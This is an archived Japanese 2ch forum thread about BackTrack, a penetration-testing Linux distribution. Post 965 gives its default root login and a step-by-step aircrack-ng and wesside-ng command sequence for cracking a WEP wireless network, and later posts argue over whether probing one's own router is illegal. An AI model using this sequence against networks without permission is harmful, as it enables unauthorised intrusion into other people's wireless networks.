[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 2chのread.cgiへ]
Update time : 05/03 07:48 / Filesize : 175 KB / Number-of Response : 967
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

BackTrack Part2



1 名前:login:Penguin [2009/01/26(月) 21:11:41 ID:g4lC0dUX]
侵入テストの分野に特化した、Linuxディストリビューションです。
2つのディストリビューションWHAXとAuditor Security Collectionが融合し
ペネトレーションテスト用に設計・開発されました。

BackTrack公式サイト
ttp://www.remote-exploit.org/backtrack.html
Forum
ttp://forums.remote-exploit.org
BackTrack Wiki
ttp://backtrack.offensive-security.com/

前スレ
BackTrackスレ
pc11.2ch.net/test/read.cgi/linux/1230103140/

964 名前:login:Penguin mailto:sage [2012/04/23(月) 11:37:50.45 ID:Aqxx5kmZ]
解析した時点でアウトなんだな

965 名前:login:Penguin mailto:sage [2012/04/28(土) 17:35:11.50 ID:x8O8s7ZM]
--TIPS
ログイン
ユーザー名:root
Passwd:toor

GUIの起動
> startx

ネットワークを有効にする
> start-network

ctrl+cで止め


airmon-ng start? wlan0

airodump-ng mon0

airodump-ng -w wep -c [CHANNEL] -b [BSSID] mon0

aireplay-ng -1 0 -a [BSSID] mon0

aireplay-ng -3 -b [BSSID] mon0

aircrack-ng wep-01.cap


# airmon-ng start wlan1(←デバイス名)

で、クラックさせたいデバイスをモニタモードします。モニタモードになったら

#wesside-ng -i mon0 (←デバイス名)-v 00:11:22:33:44:55(←ターゲットのMACアドレス)

966 名前:login:Penguin mailto:sage [2012/05/01(火) 12:05:38.56 ID:WUjZJd7G]
>>964
自分のルータを解析しただけなのに違法とかどういう事なの?






[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<175KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef